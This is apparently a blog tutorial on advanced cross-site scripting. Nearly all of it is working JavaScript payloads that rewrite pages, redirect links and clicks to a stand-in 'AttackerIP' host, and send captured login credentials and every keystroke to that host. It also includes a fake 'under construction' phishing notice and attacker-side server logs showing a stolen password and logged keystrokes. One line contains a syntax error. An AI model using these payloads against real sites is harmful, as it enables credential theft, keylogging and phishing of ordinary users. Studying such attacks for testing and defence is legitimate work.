Advanced XSS

2 minute read

Advanced XSS builds upon my previous post, Basic XSS.

Modifiying HTML


  • Changing the title of the target page to New Title.
<script> 
document.getElementsByTagName("h1")[0].innerHTML = "New Title";
</script>



  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt.
<script> 
var links = document.getElementsByTagName("a");
for (i=0; i < links.length; i++)
{
    links.[i].href = "http://AttackerIP/evil.txt";
}
</script>


Form Submission Hijacking


  • For the username and password variables we select the first form, indicated by forms[0].

  • We then select the first and second elements of said form, where elements[0] represents the username input field and elements[1] the password input field.

  • Data input into these fields are then assigned to their respective variables.

  • Once the form is submitted by the victim our function InterceptForm is called: document.forms[0].onsubmit = InterceptForm;.

  • We then simply send ourselves the captured credentials by leveraging Image().src and setting the value to our own HTTP server.

<script>
function InterceptForm()
{
    var username = document.forms[0].elements[0].value; 
    var password = document.forms[0].elements[1].value;   
    new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
}
document.forms[0].onsubmit = InterceptForm;
</script>
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the credentials from our JavaScript payload 
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -


Social Engineering


  • First we create the h2 element and input our new heading text, stating Website Under Construction.

  • Secondly, we then create the h3 element and input our malicious redirect text Please visit SuperSecureCompany.com.

  • Upon clicking, the link will send the victim to a domain/malicious file under our control.

  • We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.

  • Lastly we append our h2 and h3 header elements to the page and remove the login form that was there orginally.

<script>
var input = document.createElement("h2");
input.innerHTML = "Website Under Construction"

var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');

document.forms[0].parentNode.appendChild(input);
document.forms[0].parentNode.appendChild(link);
document.forms[0].parentNode.removeChild(document.forms[0]);
</script>


Before injection:


After injection:


Capturing Clicks


  • We declare a function CaughtClick, with a link to our malicious URL.

  • We then add an EventListener to the document body.

  • If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ this click and run our CaughtClick function. Sending the victim to a malicious site under our control.

  • For more information on JavaScript events, please click here.

<script>
function CaughtClick()
{
    location.href = "http://AttackerIP/evil.txt";
}
document.body.addEventListener('click', CaughtClick, true);
</script>


Keylogging


  • We assign the onkeypress event to our function KeyLog.

  • We then assign the victim’s input to the variable input, and parse it as an argument to the KeyLog function.

  • The key_pressed variable is assigned to a Unicode number, based on the specific key pressed by the victim, which is then converted into a character.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src.

<script>
document.onkeypress = function KeyLog(input)
{
    key_pressed = String.fromCharCode(input.which);
    new Image().src = "http://AttackerIP/?"+key_pressed;
}
</script>
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the keystrokes from our JavaScript payload 
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -